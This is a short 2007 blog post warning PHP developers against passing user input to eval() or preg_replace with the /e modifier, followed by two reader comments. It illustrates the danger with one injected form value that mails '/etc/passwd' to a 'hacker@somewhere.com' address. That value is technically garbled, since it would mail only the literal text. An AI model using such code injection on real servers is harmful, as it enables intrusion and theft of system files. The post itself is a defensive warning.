Dec

22

PHP eval is evil

December 22, 2007 |

JSON creator Douglas Crockford more than once pointed out that: in JavaScript, eval is evil. Well in PHP, eval is also almost always evil (though some people say it can be useful in a few limited cases). I personally have no guts to use it. Allowing any user-supplied data to go into an eval( ) call is asking to be hacked.

eval( ) has aliases. Do not use the /e option with preg_replace( ), the preg_replace( ) function with the /e option also calls eval( ) on PHP code, especially if you use any user-entered data in the calls.


So what does eval do? In eval ( string $code_str ), eval evaluates the string given in code_str as PHP code. Imagine you get a form username input field value using eval($_POST['username']), if the hacker type the following value in the input field: mail("hacker@somewhere.com", "Some passwords", '/bin/cat /etc/passwd'). You will be sending your server password to the hacker.

So don’t use eval unless you are suicidal. ;)



Similar Posts

Comments

Name (required)

Email (required)

Website

Speak your mind

2 Comments so far

  1. Ross on September 3, 2008 7:14 am

    I find eval very helpful in varible setting examples, for example:

    eval(’$this->debug =’ . (IS_PHP4 ? ‘&’ : ”) . ‘ new stdClass();’);

    The only cases where eval is “evil” are whereyou’re inputting user data into eval - but you should be validating and sanitising any user input anyway.

  2. admin on September 3, 2008 9:43 am

    Hi, Ross

    in your case, it provides convenience and really helpful. What I mentioned in my post was more about the possible problems eval causes.

    really appreciate your opinion. :)

Sponsors




Links